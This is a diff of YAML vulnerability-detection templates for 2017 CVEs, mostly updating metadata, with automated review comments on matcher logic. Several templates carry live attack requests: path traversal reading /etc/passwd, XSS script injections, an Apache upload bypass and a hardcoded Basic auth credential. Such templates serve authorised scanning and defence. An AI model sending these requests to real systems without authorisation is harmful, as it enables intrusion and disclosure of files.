@@ -10,18 +10,22 @@ info: - https://seclists.org/fulldisclosure/2017/Sep/57 - https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774 - https://nvd.nist.gov/vuln/detail/CVE-2017-14524 + - http://seclists.org/fulldisclosure/2017/Sep/57 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-14524 cwe-id: CWE-601 - tags: cve,cve2017,redirect,opentext,seclists + epss-score: 0.00329 + cpe: cpe:2.3:a:opentext:documentum_administrator:7.2.0180.0055:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: opentext + product: documentum_administrator + tags: cve,cve2017,redirect,opentext,seclists http: - method: GET - path: - '{{BaseURL}}/xda/help/en/default.htm?startat=//oast.me' diff --git a/http/cves/2017/CVE-2017-14535.yaml b/http/cves/2017/CVE-2017-14535.yaml index 7449d0c515..3407bba7c6 100644 --- a/http/cves/2017/CVE-2017-14535.yaml +++ b/http/cves/2017/CVE-2017-14535.yaml @@ -10,16 +10,19 @@ info: - https://www.exploit-db.com/exploits/49913 - https://nvd.nist.gov/vuln/detail/CVE-2017-14535 - https://www.linkedin.com/pulse/trixbox-os-command-injection-vulnerability-sachin-wagh-ceh-ecsa-/?published=t + - https://twitter.com/tiger_tigerboy/status/962689803270500352 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2017-14535 cwe-id: CWE-78 - cpe: cpe:2.3:a:netfortris:trixbox:*:*:*:*:*:*:*:* - epss-score: 0.04 - tags: cve,cve2017,trixbox,rce,injection,edb + epss-score: 0.06176 + cpe: cpe:2.3:a:netfortris:trixbox:2.8.0.4:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: netfortris + product: trixbox + tags: cve,cve2017,trixbox,rce,injection,edb http: - raw: @@ -34,7 +37,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2017/CVE-2017-14537.yaml b/http/cves/2017/CVE-2017-14537.yaml index f3040c18eb..c29c76fac5 100644 --- a/http/cves/2017/CVE-2017-14537.yaml +++ b/http/cves/2017/CVE-2017-14537.yaml 
@@ -15,13 +15,14 @@ info: cvss-score: 6.5 cve-id: CVE-2017-14537 cwe-id: CWE-22 - cpe: cpe:2.3:a:netfortris:trixbox:*:*:*:*:*:*:*:* - epss-score: 0.01679 + epss-score: 0.01002 + cpe: cpe:2.3:a:netfortris:trixbox:2.8.0.4:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: netfortris + product: trixbox tags: cve,cve2017,trixbox,lfi,packetstorm - http: - raw: - | @@ -33,7 +34,6 @@ http: Authorization: Basic bWFpbnQ6cGFzc3dvcmQ= xajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages - - | GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1 Host: {{Hostname}} @@ -45,11 +45,11 @@ http: matchers-condition: and matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + - type: status status: - 200 - - - type: regex - regex: - - "root:.*:0:0:" - part: body diff --git a/http/cves/2017/CVE-2017-14622.yaml b/http/cves/2017/CVE-2017-14622.yaml index c43bd2089c..bd35884585 100644 --- a/http/cves/2017/CVE-2017-14622.yaml +++ b/http/cves/2017/CVE-2017-14622.yaml @@ -8,7 +8,6 @@ info: WordPress 2kb Amazon Affiliates Store plugin before 2.1.1 contains multiple cross-site scripting vulnerabilities. The plugin allows an attacker to inject arbitrary web script or HTML via the (1) page parameter or (2) kbAction parameter in the kbAmz page to wp-admin/admin.php, thus making possible theft of cookie-based authentication credentials and launch of other attacks. reference: - https://packetstormsecurity.com/files/144261/WordPress-2kb-Amazon-Affiliates-Store-2.1.0-Cross-Site-Scripting.html - - https://web.archive.org/web/20200227144721/http://www.securityfocus.com/bid/101050 - https://wordpress.org/plugins/2kb-amazon-affiliates-store/#developers - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14622 - https://nvd.nist.gov/vuln/detail/CVE-2017-14622 
@@ -17,9 +16,14 @@ info: cvss-score: 6.1 cve-id: CVE-2017-14622 cwe-id: CWE-79 + epss-score: 0.00135 + cpe: cpe:2.3:a:2kblater:2kb_amazon_affiliates_store:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 verified: true + framework: wordpress + vendor: 2kblater + product: 2kb_amazon_affiliates_store tags: xss,wordpress,wp-plugin,wp,2kb-amazon-affiliates-store,authenticated,packetstorm http: @@ -30,7 +34,6 @@ http: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - - | GET /wp-admin/admin.php?page=kbAmz&kbAction=demo%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2017/CVE-2017-14651.yaml b/http/cves/2017/CVE-2017-14651.yaml index bc149ef0b2..c72ce37e1e 100644 --- a/http/cves/2017/CVE-2017-14651.yaml +++ b/http/cves/2017/CVE-2017-14651.yaml @@ -15,10 +15,13 @@ info: cvss-score: 4.8 cve-id: CVE-2017-14651 cwe-id: CWE-79 - epss-score: 0.00141 - tags: cve,cve2017,wso2,xss + epss-score: 0.00144 + cpe: cpe:2.3:a:wso2:api_manager:2.1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: wso2 + product: api_manager + tags: cve,cve2017,wso2,xss http: - method: GET @@ -27,15 +30,14 @@ http: matchers-condition: and matchers: - - type: word + part: body words: - "" - "Failed to add new collection" - part: body condition: and - type: word + part: header words: - "text/html" - part: header diff --git a/http/cves/2017/CVE-2017-14849.yaml b/http/cves/2017/CVE-2017-14849.yaml index 8751329f8d..abe5cdef83 100644 --- a/http/cves/2017/CVE-2017-14849.yaml +++ b/http/cves/2017/CVE-2017-14849.yaml 
@@ -9,26 +9,31 @@ info: - https://twitter.com/nodejs/status/913131152868876288 - https://nodejs.org/en/blog/vulnerability/september-2017-path-validation/ - https://nvd.nist.gov/vuln/detail/CVE-2017-14849 - - http://web.archive.org/web/20210423143109/https://www.securityfocus.com/bid/101056 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2017-14849 cwe-id: CWE-22 - tags: cve,cve2017,nodejs,lfi + epss-score: 0.96872 + cpe: cpe:2.3:a:nodejs:node.js:8.5.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: nodejs + product: node.js + tags: cve,cve2017,nodejs,lfi http: - method: GET path: - "{{BaseURL}}/static/../../../a/../../../../etc/passwd" + matchers-condition: and matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + - type: status status: - 200 - - type: regex - regex: - - "root:.*:0:0:" - part: body diff --git a/http/cves/2017/CVE-2017-15287.yaml b/http/cves/2017/CVE-2017-15287.yaml index 23ca464303..8b73a01a3f 100644 --- a/http/cves/2017/CVE-2017-15287.yaml +++ b/http/cves/2017/CVE-2017-15287.yaml @@ -15,9 +15,14 @@ info: cvss-score: 6.1 cve-id: CVE-2017-15287 cwe-id: CWE-79 - tags: dreambox,edb,cve,cve2017,xss + epss-score: 0.00129 + cpe: cpe:2.3:a:bouqueteditor_project:bouqueteditor:2.0.0:*:*:*:*:dreambox:*:* metadata: max-request: 1 + framework: dreambox + vendor: bouqueteditor_project + product: bouqueteditor + tags: dreambox,edb,cve,cve2017,xss http: - raw: diff --git a/http/cves/2017/CVE-2017-15363.yaml b/http/cves/2017/CVE-2017-15363.yaml index 80ff0777af..0e97599956 100644 --- a/http/cves/2017/CVE-2017-15363.yaml +++ b/http/cves/2017/CVE-2017-15363.yaml 
@@ -15,11 +15,14 @@ info: cvss-score: 7.5 cve-id: CVE-2017-15363 cwe-id: CWE-22 - cpe: cpe:2.3:a:luracast:restler:*:*:*:*:*:*:*:* epss-score: 0.04393 - tags: cve,cve2017,restler,lfi,edb + cpe: cpe:2.3:a:luracast:restler:*:*:*:*:*:typo3:*:* metadata: max-request: 1 + framework: typo3 + vendor: luracast + product: restler + tags: cve,cve2017,restler,lfi,edb http: - method: GET diff --git a/http/cves/2017/CVE-2017-15647.yaml b/http/cves/2017/CVE-2017-15647.yaml index 43c11e6592..5246f9d70c 100644 --- a/http/cves/2017/CVE-2017-15647.yaml +++ b/http/cves/2017/CVE-2017-15647.yaml @@ -14,9 +14,13 @@ info: cvss-score: 7.5 cve-id: CVE-2017-15647 cwe-id: CWE-22 - tags: lfi,router,edb,cve,cve2017 + epss-score: 0.02013 + cpe: cpe:2.3:o:fiberhome:routerfiberhome_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: fiberhome + product: routerfiberhome_firmware + tags: lfi,router,edb,cve,cve2017 http: - method: GET @@ -25,7 +29,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2017/CVE-2017-15715.yaml b/http/cves/2017/CVE-2017-15715.yaml index 93ba155e54..02b57dcb07 100644 --- a/http/cves/2017/CVE-2017-15715.yaml +++ b/http/cves/2017/CVE-2017-15715.yaml @@ -10,14 +10,19 @@ info: - https://httpd.apache.org/security/vulnerabilities_24.html - http://www.openwall.com/lists/oss-security/2018/03/24/6 - https://nvd.nist.gov/vuln/detail/CVE-2017-15715 + - http://www.securitytracker.com/id/1040570 classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2017-15715 cwe-id: CWE-20 - tags: apache,httpd,fileupload,vulhub,cve,cve2017,intrusive + epss-score: 0.971 + cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: apache + product: http_server + tags: apache,httpd,fileupload,vulhub,cve,cve2017,intrusive http: - raw: 
@@ -36,7 +41,6 @@ http: {{randstr}}.php\x0A ------WebKitFormBoundaryKc8fBVDo558U4hbJ-- - - | GET /{{randstr}}.php\x0A HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2017/CVE-2017-15944.yaml b/http/cves/2017/CVE-2017-15944.yaml index 9cbba50286..f4fa257ff1 100644 --- a/http/cves/2017/CVE-2017-15944.yaml +++ b/http/cves/2017/CVE-2017-15944.yaml @@ -10,13 +10,18 @@ info: - https://security.paloaltonetworks.com/CVE-2017-15944 - http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html - https://nvd.nist.gov/vuln/detail/CVE-2017-15944 + - http://www.securitytracker.com/id/1040007 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-15944 - tags: kev,edb,cve,cve2017,rce,vpn,panos,globalprotect + epss-score: 0.97414 + cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: paloaltonetworks + product: pan-os + tags: kev,edb,cve,cve2017,rce,vpn,panos,globalprotect http: - raw: diff --git a/http/cves/2017/CVE-2017-16806.yaml b/http/cves/2017/CVE-2017-16806.yaml index 9faebd146b..f63a1280fc 100644 --- a/http/cves/2017/CVE-2017-16806.yaml +++ b/http/cves/2017/CVE-2017-16806.yaml @@ -15,9 +15,13 @@ info: cvss-score: 7.5 cve-id: CVE-2017-16806 cwe-id: CWE-22 - tags: cve2017,ulterius,traversal,edb,cve + epss-score: 0.07055 + cpe: cpe:2.3:a:ulterius:ulterius_server:1.5.6.0:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: ulterius + product: ulterius_server + tags: cve2017,ulterius,traversal,edb,cve http: - method: GET @@ -27,12 +31,13 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - type: regex + part: body regex: - "root:.*:0:0:" - "\\[(font|extension|file)s\\]" condition: or - part: body + + - type: status + status: + - 200 diff --git a/http/cves/2017/CVE-2017-16877.yaml b/http/cves/2017/CVE-2017-16877.yaml index 9b43e325df..7b76625c78 100644 --- a/http/cves/2017/CVE-2017-16877.yaml +++ b/http/cves/2017/CVE-2017-16877.yaml 
@@ -14,9 +14,13 @@ info: cvss-score: 7.5 cve-id: CVE-2017-16877 cwe-id: CWE-22 - tags: cve,cve2017,nextjs,lfi,traversal + epss-score: 0.0032 + cpe: cpe:2.3:a:zeit:next.js:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: zeit + product: next.js + tags: cve,cve2017,nextjs,lfi,traversal http: - method: GET @@ -25,11 +29,10 @@ http: matchers-condition: and matchers: - - type: regex + part: body regex: - "root:.*:0:0:" - part: body condition: and - type: status diff --git a/http/cves/2017/CVE-2017-16894.yaml b/http/cves/2017/CVE-2017-16894.yaml index e24abf7458..06b374c404 100644 --- a/http/cves/2017/CVE-2017-16894.yaml +++ b/http/cves/2017/CVE-2017-16894.yaml @@ -17,11 +17,15 @@ info: cvss-score: 7.5 cve-id: CVE-2017-16894 cwe-id: CWE-200 + epss-score: 0.29151 + cpe: cpe:2.3:a:laravel:laravel:*:*:*:*:*:*:*:* metadata: max-request: 1 fofa-query: app="Laravel-Framework" shodan-query: Laravel-Framework verified: true + vendor: laravel + product: laravel tags: cve2017,laravel,exposure,packetstorm,cve http: diff --git a/http/cves/2017/CVE-2017-17043.yaml b/http/cves/2017/CVE-2017-17043.yaml index b043ddfa8d..02ebc3cbb6 100644 --- a/http/cves/2017/CVE-2017-17043.yaml +++ b/http/cves/2017/CVE-2017-17043.yaml @@ -15,9 +15,14 @@ info: cvss-score: 6.1 cve-id: CVE-2017-17043 cwe-id: CWE-79 - tags: xss,wp-plugin,packetstorm,cve,cve2017,wordpress + epss-score: 0.00245 + cpe: cpe:2.3:a:zitec:emag_marketplace_connector:1.0.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: zitec + product: emag_marketplace_connector + tags: xss,wp-plugin,packetstorm,cve,cve2017,wordpress http: - method: GET @@ -27,9 +32,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2017/CVE-2017-17059.yaml b/http/cves/2017/CVE-2017-17059.yaml index 06019b8063..b8e4acc91f 100644 --- a/http/cves/2017/CVE-2017-17059.yaml +++ b/http/cves/2017/CVE-2017-17059.yaml 
@@ -14,9 +14,14 @@ info: cvss-score: 6.1 cve-id: CVE-2017-17059 cwe-id: CWE-79 - tags: xss,wp-plugin,packetstorm,cve,cve2017,wordpress + epss-score: 0.00263 + cpe: cpe:2.3:a:amtythumb_project:amtythumb:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: amtythumb_project + product: amtythumb + tags: xss,wp-plugin,packetstorm,cve,cve2017,wordpress http: - method: POST @@ -28,9 +33,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2017/CVE-2017-17451.yaml b/http/cves/2017/CVE-2017-17451.yaml index 8d82d9b3ea..057d68e0cf 100644 --- a/http/cves/2017/CVE-2017-17451.yaml +++ b/http/cves/2017/CVE-2017-17451.yaml @@ -15,9 +15,14 @@ info: cvss-score: 6.1 cve-id: CVE-2017-17451 cwe-id: CWE-79 - tags: cve,cve2017,wordpress,xss,wp-plugin,packetstorm + epss-score: 0.00178 + cpe: cpe:2.3:a:wpmailster:wp_mailster:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: wpmailster + product: wp_mailster + tags: cve,cve2017,wordpress,xss,wp-plugin,packetstorm http: - method: GET @@ -27,9 +32,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2017/CVE-2017-17562.yaml b/http/cves/2017/CVE-2017-17562.yaml index 7cf3385dd1..4c3bd723a2 100644 --- a/http/cves/2017/CVE-2017-17562.yaml +++ b/http/cves/2017/CVE-2017-17562.yaml @@ -17,9 +17,13 @@ info: cvss-score: 8.1 cve-id: CVE-2017-17562 cwe-id: CWE-20 - tags: cve,cve2017,rce,goahead,fuzz,kev,vulhub + epss-score: 0.9747 + cpe: cpe:2.3:a:embedthis:goahead:*:*:*:*:*:*:*:* metadata: max-request: 65 + vendor: embedthis + product: goahead + tags: cve,cve2017,rce,goahead,fuzz,kev,vulhub http: - raw: @@ -95,11 +99,10 @@ http: - webviewLogin_m64 - webviewer - welcome - stop-at-first-match: true + matchers-condition: and matchers: - - type: word words: - "environment variable" 
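Review bot: Dropping `stop-at-first-match: true` in the last CVE-2017-17562 hunk means the template keeps sending the remaining CGI-name requests (`max-request: 65` per the first hunk) even after one has already matched, which makes each host slower to scan and generates far more traffic than before; unless the later paths yield a distinct finding, keep `stop-at-first-match: true` next to the new `matchers-condition: and`. The switch from the implicit `or` to `and` also needs checking against the matchers that follow `- "environment variable"`, which lie outside this hunk.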
diff --git a/http/cves/2017/CVE-2017-17731.yaml b/http/cves/2017/CVE-2017-17731.yaml index 6e00b94647..7b9bd698ed 100644 --- a/http/cves/2017/CVE-2017-17731.yaml +++ b/http/cves/2017/CVE-2017-17731.yaml @@ -14,13 +14,17 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 + cve-id: CVE-2017-17731 cwe-id: CWE-89 + epss-score: 0.11468 + cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:* metadata: fofa-query: app="DedeCMS" max-request: 1 shodan-query: http.html:"DedeCms" + vendor: dedecms + product: dedecms tags: sqli,dedecms - variables: num: "999999999" diff --git a/http/cves/2017/CVE-2017-17736.yaml b/http/cves/2017/CVE-2017-17736.yaml index 82d1dea866..ad5249a47a 100644 --- a/http/cves/2017/CVE-2017-17736.yaml +++ b/http/cves/2017/CVE-2017-17736.yaml @@ -15,10 +15,14 @@ info: cvss-score: 9.8 cve-id: CVE-2017-17736 cwe-id: CWE-425 + epss-score: 0.1483 + cpe: cpe:2.3:a:kentico:kentico_cms:*:*:*:*:*:*:*:* metadata: max-request: 1 google-query: intitle:"kentico database setup" verified: true + vendor: kentico + product: kentico_cms tags: cve,cve2017,kentico,cms,install,unauth,edb http: diff --git a/http/cves/2017/CVE-2017-18024.yaml b/http/cves/2017/CVE-2017-18024.yaml index c00441e25c..35031150f7 100644 --- a/http/cves/2017/CVE-2017-18024.yaml +++ b/http/cves/2017/CVE-2017-18024.yaml @@ -14,9 +14,13 @@ info: cvss-score: 6.1 cve-id: CVE-2017-18024 cwe-id: CWE-79 - tags: avantfax,hackerone,packetstorm,cve,cve2017,xss + epss-score: 0.00072 + cpe: cpe:2.3:a:avantfax:avantfax:3.3.3:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: avantfax + product: avantfax + tags: avantfax,hackerone,packetstorm,cve,cve2017,xss http: - raw: @@ -30,17 +34,17 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - 'AvantFAX' - part: body condition: and - - type: status - status: - - 200 - - type: word part: header words: - "text/html" + + - type: status + status: + - 200 
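Review bot: The newly added `cve-id: CVE-2017-17731` is not reflected in `tags: sqli,dedecms`, which still lacks the `cve,cve2017` tags every other CVE template in this diff carries, so runs selected with `-tags cve` will skip this template; change it to `tags: cve,cve2017,sqli,dedecms`. A `cwe-id: CWE-89` with no `cve-id` was the likely reason the metadata script missed it before.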
diff --git a/http/cves/2017/CVE-2017-18536.yaml b/http/cves/2017/CVE-2017-18536.yaml index 4ad2aa8cf6..20ee57ef07 100644 --- a/http/cves/2017/CVE-2017-18536.yaml +++ b/http/cves/2017/CVE-2017-18536.yaml @@ -14,9 +14,14 @@ info: cvss-score: 6.1 cve-id: CVE-2017-18536 cwe-id: CWE-79 - tags: wpscan,cve,cve2017,wordpress,xss,wp-plugin + epss-score: 0.00088 + cpe: cpe:2.3:a:fullworks:stop_user_enumeration:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: fullworks + product: stop_user_enumeration + tags: wpscan,cve,cve2017,wordpress,xss,wp-plugin http: - method: GET @@ -26,9 +31,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2017/CVE-2017-18598.yaml b/http/cves/2017/CVE-2017-18598.yaml index a532f0fd49..e910d85074 100644 --- a/http/cves/2017/CVE-2017-18598.yaml +++ b/http/cves/2017/CVE-2017-18598.yaml @@ -15,11 +15,14 @@ info: cvss-score: 6.1 cve-id: CVE-2017-18598 cwe-id: CWE-79 - cpe: cpe:2.3:a:designmodo:qards:*:*:*:*:*:*:*:* epss-score: 0.00094 - tags: wp-plugin,oast,wpscan,cve,cve2017,wordpress,ssrf,xss + cpe: cpe:2.3:a:designmodo:qards:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: designmodo + product: qards + tags: wp-plugin,oast,wpscan,cve,cve2017,wordpress,ssrf,xss http: - method: GET diff --git a/http/cves/2017/CVE-2017-18638.yaml b/http/cves/2017/CVE-2017-18638.yaml index 363be74494..0da8ed62b0 100644 --- a/http/cves/2017/CVE-2017-18638.yaml +++ b/http/cves/2017/CVE-2017-18638.yaml 
@@ -11,16 +11,19 @@ info: - https://github.com/graphite-project/graphite-web/issues/2008 - https://github.com/advisories/GHSA-vfj6-275q-4pvm - https://nvd.nist.gov/vuln/detail/CVE-2017-18638 + - https://github.com/graphite-project/graphite-web/pull/2499 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2017-18638 cwe-id: CWE-918 + epss-score: 0.00902 cpe: cpe:2.3:a:graphite_project:graphite:*:*:*:*:*:*:*:* - epss-score: 0.00639 - tags: cve,cve2017,graphite,ssrf,oast metadata: max-request: 1 + vendor: graphite_project + product: graphite + tags: cve,cve2017,graphite,ssrf,oast http: - method: GET diff --git a/http/cves/2017/CVE-2017-3506.yaml b/http/cves/2017/CVE-2017-3506.yaml index 95d3ba460c..cf7415ab27 100644 --- a/http/cves/2017/CVE-2017-3506.yaml +++ b/http/cves/2017/CVE-2017-3506.yaml @@ -9,14 +9,18 @@ info: - https://hackerone.com/reports/810778 - https://nvd.nist.gov/vuln/detail/CVE-2017-3506 - http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html - - http://web.archive.org/web/20210124033731/https://www.securityfocus.com/bid/97884/ + - http://www.securitytracker.com/id/1038296 classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N cvss-score: 7.4 cve-id: CVE-2017-3506 - tags: rce,oast,hackerone,cve,cve2017,weblogic,oracle + epss-score: 0.96927 + cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: oracle + product: weblogic_server + tags: rce,oast,hackerone,cve,cve2017,weblogic,oracle http: - raw: @@ -45,6 +49,6 @@ http: matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" diff --git a/http/cves/2017/CVE-2017-3528.yaml b/http/cves/2017/CVE-2017-3528.yaml index 068bb0f0ac..d2a62888f1 100644 --- a/http/cves/2017/CVE-2017-3528.yaml +++ b/http/cves/2017/CVE-2017-3528.yaml 
@@ -10,14 +10,19 @@ info: - https://www.exploit-db.com/exploits/43592 - https://nvd.nist.gov/vuln/detail/CVE-2017-3528 - http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html + - http://www.securitytracker.com/id/1038299 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2017-3528 cwe-id: CWE-601 - tags: oracle,redirect,edb,cve,cve2017 + epss-score: 0.00865 + cpe: cpe:2.3:a:oracle:applications_framework:12.1.3:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: oracle + product: applications_framework + tags: oracle,redirect,edb,cve,cve2017 http: - method: GET @@ -26,6 +31,6 @@ http: matchers: - type: word + part: body words: - 'noresize src="/\interact.sh?configName=' - part: body diff --git a/http/cves/2017/CVE-2017-4011.yaml b/http/cves/2017/CVE-2017-4011.yaml index f5addf6b5d..af96fb7c99 100644 --- a/http/cves/2017/CVE-2017-4011.yaml +++ b/http/cves/2017/CVE-2017-4011.yaml @@ -9,19 +9,25 @@ info: - https://medium.com/@david.valles/cve-2017-4011-reflected-xss-found-in-mcafee-network-data-loss-prevention-ndlp-9-3-x-cf20451870ab - https://kc.mcafee.com/corporate/index?page=content&id=SB10198 - https://nvd.nist.gov/vuln/detail/CVE-2017-4011 + - http://www.securitytracker.com/id/1038523 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-4011 cwe-id: CWE-79 - tags: cve,cve2017,mcafee,xss + epss-score: 0.00142 + cpe: cpe:2.3:a:mcafee:network_data_loss_prevention:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: mcafee + product: network_data_loss_prevention + tags: cve,cve2017,mcafee,xss http: - method: GET path: - "{{BaseURL}}" + headers: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);// diff --git a/http/cves/2017/CVE-2017-5487.yaml b/http/cves/2017/CVE-2017-5487.yaml index f90d19bd82..a61ad11b07 100644 --- a/http/cves/2017/CVE-2017-5487.yaml +++ b/http/cves/2017/CVE-2017-5487.yaml 
@@ -10,15 +10,20 @@ info: - https://www.wordfence.com/blog/2016/12/wordfence-blocks-username-harvesting-via-new-rest-api-wp-4-7/ - https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/ - https://nvd.nist.gov/vuln/detail/CVE-2017-5487 + - http://www.openwall.com/lists/oss-security/2017/01/14/6 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2017-5487 cwe-id: CWE-200 + epss-score: 0.97204 + cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:* metadata: max-request: 2 shodan-query: http.component:"WordPress" verified: true + vendor: wordpress + product: wordpress tags: cve,cve2017,wordpress,wp,edb http: @@ -28,9 +33,9 @@ http: - "{{BaseURL}}/?rest_route=/wp/v2/users/" stop-at-first-match: true + matchers-condition: and matchers: - - type: word part: body words: @@ -50,8 +55,8 @@ http: extractors: - type: json - part: body name: "usernames" json: - '.[] | .slug' - '.[].name' + part: body diff --git a/http/cves/2017/CVE-2017-5521.yaml b/http/cves/2017/CVE-2017-5521.yaml index 9ee42021b0..185a441acb 100644 --- a/http/cves/2017/CVE-2017-5521.yaml +++ b/http/cves/2017/CVE-2017-5521.yaml 
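Review bot: `matchers-condition: and` is introduced into CVE-2017-5487 where the template previously relied on the default, which in nuclei is `or`; if the matchers block (its remainder is outside the hunk) holds more than one matcher, the template now requires all of them to hit and may stop reporting targets it matched before. The same addition appears in CVE-2017-5689, CVE-2017-7615, CVE-2017-9791, CVE-2017-9805, CVE-2018-1000129 and CVE-2018-1000856. For single-matcher templates the key is redundant; for multi-matcher ones the semantic change should be deliberate and verified rather than applied mechanically.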
@@ -9,16 +9,20 @@ info: reference: - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2017-5521-bypassing-authentication-on-netgear-routers/ - http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability - - http://web.archive.org/web/20210123212905/https://www.securityfocus.com/bid/95457/ - https://nvd.nist.gov/vuln/detail/CVE-2017-5521 + - https://www.exploit-db.com/exploits/41205/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2017-5521 cwe-id: CWE-200 - tags: cve,cve2017,auth-bypass,netgear,router,kev + epss-score: 0.97402 + cpe: cpe:2.3:o:netgear:r6200_firmware:1.0.1.56_1.0.43:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: netgear + product: r6200_firmware + tags: cve,cve2017,auth-bypass,netgear,router,kev http: - method: GET diff --git a/http/cves/2017/CVE-2017-5631.yaml b/http/cves/2017/CVE-2017-5631.yaml index 70399dd74a..75bc656d40 100644 --- a/http/cves/2017/CVE-2017-5631.yaml +++ b/http/cves/2017/CVE-2017-5631.yaml @@ -14,9 +14,13 @@ info: cvss-score: 6.1 cve-id: CVE-2017-5631 cwe-id: CWE-79 - tags: edb,cve,cve2017,xss,caseaware + epss-score: 0.00286 + cpe: cpe:2.3:a:kmc_information_systems:caseaware:-:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: kmc_information_systems + product: caseaware + tags: edb,cve,cve2017,xss,caseaware http: - method: GET diff --git a/http/cves/2017/CVE-2017-5638.yaml b/http/cves/2017/CVE-2017-5638.yaml index 7169cd0706..99477c463d 100644 --- a/http/cves/2017/CVE-2017-5638.yaml +++ b/http/cves/2017/CVE-2017-5638.yaml 
